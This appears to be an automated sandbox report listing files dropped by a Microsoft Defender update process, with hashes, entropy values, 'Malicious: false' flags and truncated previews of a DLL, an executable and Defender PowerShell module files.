C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MsMpLics.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	21768
Entropy (8bit):	4.73355600681099
Encrypted:	false
SSDEEP:	192:0Wg3HWMALc2Fu462TNgRpSDBQABJ0OpF+nasu+JX01k9z3AzsNvCEVE:0Wg3HWM1MJjDBRJlpUad+JR9zusN7VE
MD5:	56C96953AC9158CBD42E69ED7F97A7F8
SHA1:	4DEED0464F3A0CA22D8CDD5BE0B050EAE1B8A124
SHA-256:	4CDB750A61129171ED6BDBFEEF0531267C5F3255F0EF64F211BEFAB40C27AF48
SHA-512:	23CDAFBEFD19136170B409DB9B2AECAFDE594F145B825F8D57F4CDD2BE2DAA308E0673EE6A75E7204E4E4BC417650C5F44F74DD4CD533B0A9ECCEDF6810AE462
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d....F.Z.........." ......... ...............................................0............`.......................................................... ...............0...%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\NisSrv.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3116848
Entropy (8bit):	6.512761509155942
Encrypted:	false
SSDEEP:	49152:YrHb7Kijoa19g6ss1A+XeXrSTz8E06VPzTBP/QO6B70HavlazVuAr:YrXJM07V1
MD5:	F38768BA269467EA171A5AB304408D6A
SHA1:	0F5BB7DCCFF14D76A67BE1AEAF81CD7C658FEFBE
SHA-256:	87F545258C7DC408006A9EB392D91B74FED35CB21437CD0F3D653E8277AF60BB
SHA-512:	E4DCB0A5FCB63308EC11E988A3CFF068D27D498135609CB9C7639036639802A1CE2F1707C6414F16D1B9A21F6F0F5D6BE2C9BD1557E9378AD59898C3A2D2AB20
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T.....................................\.......................2.................A.....0.............Rich....................PE..d.....b...........".......'..........D%........@..............................0.....H50...`..................................................U,.,...../.H....@...f..../.0...../.03....(.p...................P.'.(.....'.@...........x.'.P...0K,......................text.....'.......'................. ..`.rdata..tX... '..`... '.............@..@.data...0.....,.......,.............@....pdata...f...@...p...0-.............@..@.didat......../.....................@....rsrc...H...../.....................@..@.reloc..03..../..@..................@..B........................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\Defender.psd1

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	15169
Entropy (8bit):	5.98493580150489
Encrypted:	false
SSDEEP:	384:gBYYHOIwJu4mSFCzWFBjObOFN5YxMsrRhmKa7iKV23i/rIwg:XYHOIwJu4mwhcYzbsrRhmzey2KrA
MD5:	2249B509298F1B6048E05506974F1874
SHA1:	D34EB00A3D91C254CEEBD88BA86F9F9AAFD10F43
SHA-256:	49047C3E3F7F96E0D04C6ECCD7E58592B3E53E96944A8DF103FA31361D654F5D
SHA-512:	7374983DDA6FD3E01E998AD660FF5E6EBC4C5F7EAE1D2F3CCB1846FEEA3433A6292F678ADE8D50187E1CEF96C777A633832F38A34C32C3BC9D7AC26B0E6204C6
Malicious:	false
Preview:	@{.. GUID = 'C46BE3DC-30A9-452F-A5FD-4BF9CA87A854'.. Author="Microsoft Corporation".. CompanyName="Microsoft Corporation".. Copyright="Copyright (C) Microsoft Corporation. All rights reserved.".. ModuleVersion = '1.0'.. NestedModules = @( 'MSFT_MpComputerStatus.cdxml',.. 'MSFT_MpPreference.cdxml',.. 'MSFT_MpThreat.cdxml',.. 'MSFT_MpThreatCatalog.cdxml',.. 'MSFT_MpThreatDetection.cdxml',.. 'MSFT_MpScan.cdxml',.. 'MSFT_MpSignature.cdxml',.. 'MSFT_MpWDOScan.cdxml',.. 'MSFT_MpRollback.cdxml'.. ).... FunctionsToExport = @( 'Get-MpPreference',.. 'Set-MpPreference',.. 'Add-MpPreference',.. 'Remove-MpPreference',.. 'Get-MpComputerStatus',.. 'Get-MpThr

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\DefenderPerformance.psd1

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	14315
Entropy (8bit):	5.9999306217827
Encrypted:	false
SSDEEP:	384:ZYHOIwJu4mSFCRDo58rxhWwQUgIpIN6bSE1wZFPe:ZYHOIwJu4mwYi8r7WwlE6P1wZw
MD5:	CE2037B591E8EE0D5D89F80D416B5A3B
SHA1:	08E0E91567FB8C8BEECF3555DA934C6739922072
SHA-256:	A0F884FAAC5D057B3E005429FBC7BF4FA4239419847939F802CD6A588D622B43
SHA-512:	C7CB60A44751BF40FB23E8856207B2D045D7F912F5F760C9D07A2022FEDE5ACAE857BA7C9D65A2018FA3E3860687CEA9442FCC4A30783F7AFB35BABEC2AC91B4
Malicious:	false
Preview:	@{.. GUID = 'A51E6D9E-BC14-41A7-98A8-888195641250'.. Author="Microsoft Corporation".. CompanyName="Microsoft Corporation".. Copyright="Copyright (C) Microsoft Corporation. All rights reserved.".. ModuleVersion = '1.0'.. NestedModules = @('MSFT_MpPerformanceRecording.psm1').... FormatsToProcess = @('MSFT_MpPerformanceReport.Format.ps1xml').... CompatiblePSEditions = @('Desktop', 'Core').... FunctionsToExport = @( 'New-MpPerformanceRecording',.. 'Get-MpPerformanceReport'.. ).. HelpInfoUri="http://go.microsoft.com/fwlink/?linkid=390762".. PowerShellVersion = '5.1'..}....# SIG # Begin signature block..# MIIleQYJKoZIhvcNAQcCoIIlajCCJWYCAQExDzANBglghkgBZQMEAgEFADB5Bgor..# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG..# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC5QoGq9EV41ZN5..# fnwNlxKx8aIBP8W7y/AxkQ4SrJmPcKCCC14wggTrMIID06ADAgECAhMzAAAI/yN0..# 5bNiDD7eAAAAAAj/MA0GCSqGSIb3DQEBCwUA

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpComputerStatus.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15565
Entropy (8bit):	6.002588540208934
Encrypted:	false
SSDEEP:	384:on0LK0WHQV80tQEFvcjhYa85wyGvy0bW5Wb0CnV/KI:E0LK0WHY80tQvj6a8GyGvQWdnlp
MD5:	76B112FAE2CD94774D83033FC5C81B5D
SHA1:	855EA7E2F4F88F49AB61505782275E14DBA33A32
SHA-256:	C5ED226D73FCF42F1895256BB80B67734607D07A113B6214E8B36CD780AA0D91
SHA-512:	2441218BD2D91242BC733BD2E05C92E7FBDD2CFDF1D0148BC9ABC2D82E99CF4210D3B4A924E110331D55F30EBD9E3848E1256665A0DA72CF41965E31D670DB6A
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpComputerStatus">.. <Version>1.0</Version>.. <DefaultNoun>MpComputerStatus</DefaultNoun>.... <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. .. </GetCmdletParameters>.. </InstanceCmdlets> .. </Class>.. ..</PowerShellMetadata>........ SIG # Begin signature block -->.. MIIleQYJKoZIhvcNAQcCoIIlajCCJWYCAQExDzANBglghkgBZQMEAgEFADB5Bgor -->.. BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG -->.. KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCCGKubREngV5EF -->.. DodK5brTAqlkaVHav/M+SkqGWqFKKqCCC14wggTrMIID06ADAgECAhMzAAAI/yN0 -->.. 5bNiDD7eAAAAAAj/MA0GCSqGSIb3DQEBCwUAMHkxCzAJBgNVBAYTAlVTMRMwEQYD -->.. VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy -->.. b3NvZnQgQ29y

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpPerformanceRecording.psm1

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	47935
Entropy (8bit):	5.579128775704969
Encrypted:	false
SSDEEP:	768:yF4WapeFhb1KVSMK3xFivFo1BWMmr8OGPDKQxV/U9LqoquhYHOIwJu4mwxZcYzbq:yIYrR4vFo1BWMmr8OGPDKQxV/U9Lq3/T
MD5:	2EA89BBC0492742F1485532EFAFE1C4A
SHA1:	F6954BD3FE4D06F02D54681AC049F9A15167B91A
SHA-256:	A36D3C22CB21DA1564F9946C98A52D99C64D062E8FC346B3B4205FFBBC2003C3
SHA-512:	6FEC5E7FF16DA9F06788FACE19ECFF09719E687744D126145789B27F2FFDA4BBBD463139182E86DD5ED07C5F208752C5B4E95BB08EBAA0BF982F0E595E3385A3
Malicious:	false
Preview:	## Copyright (c) Microsoft Corporation. All rights reserved.....<#...SYNOPSIS..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans......DESCRIPTION..This cmdlet collects a performance recording of Microsoft Defender Antivirus..scans. These performance recordings contain Microsoft-Antimalware-Engine..and NT kernel process events and can be analyzed after collection using the..Get-MpPerformanceReport cmdlet.....This cmdlet requires elevated administrator privileges.....The performance analyzer provides insight into problematic files that could..cause performance degradation of Microsoft Defender Antivirus. This tool is..provided "AS IS", and is not intended to provide suggestions on exclusions...Exclusions can reduce the level of protection on your endpoints. Exclusions,..if any, should be defined with caution......EXAMPLE..New-MpPerformanceRecording -RecordTo:.\Defender-scans.etl....#>..function New-MpPerformanceRecording {.. [CmdletBinding(DefaultPara

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpPerformanceRecording.wprp

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text
Category:	modified
Size (bytes):	4971
Entropy (8bit):	4.542570045638256
Encrypted:	false
SSDEEP:	96:aAPEP3EPGEPJuDhDEMTRBTCq6IQEPvAwWSJNLKI+EPZMhkvyXHkJi2eEPZMUkvy/:aAcPUPpPJfMTRBTr6ILPvAwW6NRPZMh2
MD5:	990729AD92C1325C42B04BC975ECBD57
SHA1:	1CDBE901753CCE8D933DF8D50507CE16A25AA428
SHA-256:	E796454FEE4CF17EFDC25DB5FEEF00A5D7C1B335E6C4B4FE996E8AD7CAB01BC8
SHA-512:	EA0BCD6122068DA9412E5195C7AA3017C187790C790197AC5AF129F3ACF6C23780169C0165627E5C55CB3B99E6931CB18A42E61701C647FF07EAF6DA2740DAEB
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" standalone='yes'?>..<WindowsPerformanceRecorder Version="1.0" Author="Microsoft Defender for Endpoint" Team="Microsoft Defender for Endpoint" Comments="Microsoft Defender for Endpoint Scan performance tracing" Company="Microsoft Corporation" Copyright="Microsoft Corporation">. <Profiles>. System Providers -->.. <SystemProvider Id="SystemProvider_Scans_Light">. <Keywords>. <Keyword Value="CpuConfig" />. <Keyword Value="ProcessThread" />. <Keyword Value="ProcessCounter" />. </Keywords>. </SystemProvider>.. <SystemProvider Id="SystemProvider_Scans_Verbose" Base="SystemProvider_Scans_Light">. <Keywords Operation="Add">. <Keyword Value="Loader" />. <Keyword Value="SampledProfile"/>. </Keywords>. <Stacks>. <Stack Value="SampledProfile"/>. </Stacks>. </Syste

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpPerformanceReport.Format.ps1xml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	63612
Entropy (8bit):	4.598281135137091
Encrypted:	false
SSDEEP:	768:Bw2CW0LK0WHY80tQreAqVhYMbh96Jg+GjWuW:Bw2CTVtHBdHbKuW
MD5:	8A46F440466ABA5A5D9AF56526799DE7
SHA1:	77637AE7FF8C39FD77F6B4CDCFE222A13A223CB7
SHA-256:	03E06EDFB3FE9FC11064BFB8AA8493FD354C55A6C696C9A1B50D5B14C440186C
SHA-512:	951601F925E8722E81D059AB94840CA128028003F588D17C6ACF2E992F8F12319374635AEDEF2D24D4670D5A64EE8DC96124C6A90102F69DAA520491096D8245
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<Configuration>.. <ViewDefinitions>.. <View>.. <Name>default</Name>.. <ViewSelectedBy>.. <TypeName>MpPerformanceReport.Result</TypeName>.. <TypeName>Deserialized.MpPerformanceReport.Result</TypeName>.. </ViewSelectedBy>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <ExpressionBinding>.. <PropertyName>TopFiles</PropertyName>.. <ItemSelectionCondition>.. <ScriptBlock>($_ \| gm -Name:'TopFiles' -MemberType:NoteProperty).Count -gt 0</ScriptBlock>.. </ItemSelectionCondition>.. <CustomControl>.. <CustomEntries>.. <CustomEntry>.. <CustomItem>.. <NewLine />.. <Text>TopFiles</Text>.. <NewLine />.. <Text>========</Text>..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpPreference.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	116938
Entropy (8bit):	4.093756521027276
Encrypted:	false
SSDEEP:	768:5oISOD2TIWNoVejxo98O0LK0WHY80tQ9C2ByGCWdnx3LI:5lSODnWNgejx3rVt+q
MD5:	5E86E45C883373AECFBB0CF4A6D87E08
SHA1:	35A2D861F857E3D99F943176250E38CF48A5118C
SHA-256:	86F1A6AFE5DEE08BBAAEB55982829469C8728CD853428BC271ACA45F5318D05D
SHA-512:	F26BBA1BEBEE66AE63AE80FC968CF55F670999454A9177AF21D752CC8217CCFB045A5D8F44E9E8E6AC4759042A255E6C975E469B0DCAFB5BA9D8048BCC0EA3B2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="root\Microsoft\Windows\Defender\MSFT_MpPreference" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpPreference</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. </GetCmdletParameters>.. </InstanceCmdlets>.... <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Set" />.. <Method MethodName="Set">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ExclusionPath">..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpRollback.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	16417
Entropy (8bit):	5.997052095509695
Encrypted:	false
SSDEEP:	384:iSD3Dnk0LK0WHQV80tQEF5IvDKLEZVhYMbo296oaXwGrGObqW27iN:iJ0LK0WHY80tQHAqVhYMbh96Jg+GjWWK
MD5:	89D599DDCA244DE89577AADBC19BCD02
SHA1:	8B4C04631C1CC6B78B81626E6826581E69F913C7
SHA-256:	EC39C0F8BC4D860728D8DB3602652CB58FADC508BCBAE34A7B8DEDC71A636CFD
SHA-512:	A18FA0D5A92330F26A8AEDA32CFF8F1B0231E37321AFD798479252ECF524235F3AE2B1F1F6340E1F976C7A5A82CCEEBB845C45F2EC7D65A9C1350AE5F2D82101
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpRollback" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpRollback</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="Engine">.. <Type PSType="switch" />.. <CmdletParameterMetadata>.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. </CmdletParameterMetadata>.. </Parameter>.. <Parameter ParameterName="Platform">.. <Type PSType="switch" />..

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpScan.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	16893
Entropy (8bit):	5.990176210459719
Encrypted:	false
SSDEEP:	384:7DORD5N430LK0WHQV80tQEFvyhKHNDyGS9aW5Wb0CnirVjI:t0LK0WHY80tQ/oZyGS9VWdnek
MD5:	B8B11F642C8D368A72E7EB2DAD68E3A5
SHA1:	8E3614F75FBD03A4CA656191E5070DB996977B78
SHA-256:	1FA0F28191F99613F3D5F39D6E27D851E5C7DF2CE7F3EF9CF55FCB3A8E0B639C
SHA-512:	8439C36CE7B377462B35541D40BB07EF3074D8840753188C968ECE3689AD198BBF52C9524FF1E1B6FF51A5AC54B4610C291E784008B50CAC40352129B3DE1E4F
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpScan" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpScan</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Start" />.. <Method MethodName="Start">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="ScanPath">.. <Type PSType="System.String" />.. <CmdletParameterMetadata>.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. </CmdletParameterMetadata>.. </Parameter>.. <Parameter ParameterName="ScanType">.. <Type PSType="MpScan.ScanType

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpSignature.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	16877
Entropy (8bit):	5.991826912444448
Encrypted:	false
SSDEEP:	384:E6D5YR4/0LK0WHQV80tQEFvGhIsR3gIyGzBW5Wb0CnMG8:z0LK0WHY80tQzC2ByGCWdnMp
MD5:	840180372C1BFDD5E480D695F00BEA05
SHA1:	98CDD72DEFC87CAC4753ABF4B9979144549639EE
SHA-256:	F67DDC77905A206434220AB1E59FF1CE6C452BCB391755710764FA05E75D7F98
SHA-512:	909BA31ECD1B977C17D9DC6B5C05811D2683DC70752AF7945498DC76D476E9CB79846E2E50354F12EBFCCBA4E6977F3BBEC49DE3EB37E7975E4C0A3A0CC5BBB3
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpSignature" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpSignature</DefaultNoun>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Update" />.. <Method MethodName="Update">.. <ReturnValue>.. <Type PSType="System.Int32" />.. <CmdletOutputMetadata>.. <ErrorCode />.. </CmdletOutputMetadata>.. </ReturnValue>.. <Parameters>.. <Parameter ParameterName="UpdateSource">.. <Type PSType="MpSignature.UpdateSource" />.. <CmdletParameterMetadata>.. <AllowEmptyString />.. <AllowNull />.. <ValidateNotNull />.. <ValidateNotNullOrEmpty />.. <ValidateSet>.. <AllowedValue>In

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpThreat.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	16503
Entropy (8bit):	5.9787160175042695
Encrypted:	false
SSDEEP:	384:Tu0LK0WHQV80tQEFvKwHxByGQ4cOhW5Wb0CnSLsZO:S0LK0WHY80tQ7wHvyGv2WdnWmO
MD5:	11A592F312945D1CDE2D0AC481E9BB6D
SHA1:	10D5CDF465A528D85470C079E58E300BC85B2CF4
SHA-256:	AF755B9A91AF1494C24753F835D96F7DCB7536FA3AF85A856AED93C7C1DD9D8C
SHA-512:	4CA8DCC309325C97A2A498B461E13873AD8C03C4EFD077897740E5103F9E0D40DA5DB3091103FF560BCEC8F0523DD065C520AC01216AA57CACD68CDA475118D5
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreat" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreat</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. <StaticCmdlets>.. <Cmdlet>.. <CmdletMetadata Verb="Remov

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpThreatCatalog.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	16048
Entropy (8bit):	6.0030092065415355
Encrypted:	false
SSDEEP:	384:L0LK0WHQV80tQEF5oMfN3PMLEZlneZMMbo296oaXwGrK6EidnkPnIC:L0LK0WHY80tQeiqNTMbh96Jg+KYn+nIC
MD5:	21960A4C9E8354BA0C5FD0B008A66080
SHA1:	6E4F8F25DF48026AA1B69E8F4B1AE87C209FF5EC
SHA-256:	99595A3BCBD4C771FAADA224BC0C84CE4EFA3B85884717C731D7C693D3D50615
SHA-512:	9A877F2AB94A08777148B3B191CFBC7BEFB324AF335110A34FB4C2AA910940B5971D8E527BDD0985756016BA3D0B51F8B54DAFA7C6996F32C59421E2009E3BE6
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatCatalog" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatCatalog</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIljwYJKoZIhvcNAQcCoI

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpThreatDetection.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15997
Entropy (8bit):	6.0030035275776985
Encrypted:	false
SSDEEP:	384:C0LK0WHQV80tQEFvMhKHNDyGS9aW5Wb0Cni0KVJ:C0LK0WHY80tQRoZyGS9VWdnSJ
MD5:	D4EBF96E5BB8B896BDD7460EB2059552
SHA1:	1FFE3E1B208AF3418AA7910808BC6E52F6AFA9B2
SHA-256:	AE315C6AE4E5F3B4C80DCB88BAE6C5FF515AEA476B115A037DC2DC6002BE8CDA
SHA-512:	5E7A65F47A4DC1211644C367E29B6162DF34E6BD9B9713230FD0E19368352523F3703C55907957112C7C787E97C0A7AE6662902CB1B3103967E1318B850AC43F
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<PowerShellMetadata xmlns="http://schemas.microsoft.com/cmdlets-over-objects/2009/11">.. <Class ClassName="ROOT\Microsoft\Windows\Defender\MSFT_MpThreatDetection" ClassVersion="1.0">.. <Version>1.0</Version>.. <DefaultNoun>MpThreatDetection</DefaultNoun>.. <InstanceCmdlets>.. <GetCmdletParameters DefaultCmdletParameterSet="DefaultSet">.. <QueryableProperties>.. <Property PropertyName="ThreatID">.. <Type PSType="int64" />.. <RegularQuery>.. <CmdletParameterMetadata IsMandatory="false" Aliases="ID".. CmdletParameterSets="ById" />.. </RegularQuery>.. </Property>.. </QueryableProperties>.. </GetCmdletParameters>.. </InstanceCmdlets>.. </Class>..</PowerShellMetadata>.. SIG # Begin signature block -->.. MIIleQYJKoZIhvcNAQcCoIIlajCCJW

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Powershell\MSFT_MpWDOScan.cdxml

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	15776
Entropy (8bit):	6.001974939961335
Encrypted:	false
SSDEEP:	384:L30LK0WHQV80tQEFvdwHxByGQ4cOhW5Wb0CnSZn5:b0LK0WHY80tQcwHvyGv2Wdn05
MD5:	630DD6CE09085E75DF744F9424867818
SHA1:	C5DB7ED9F6C4EBAA17AF6B351D8D24CDB60371F7
SHA-256:	D4EFEDC563EC7068A215D762593B2CD4BF44E3B7559D71B06312889AF8B134B8
SHA-512:	4D4903A65481CF26E2FE39E66C970148C87861C71453CD139DBDC4A8A3ACA77F7B15E4B8B352CCB128F6CFAD64686A7987A5E45B3B91778B8552A1003D8FE188
Malicious:	false
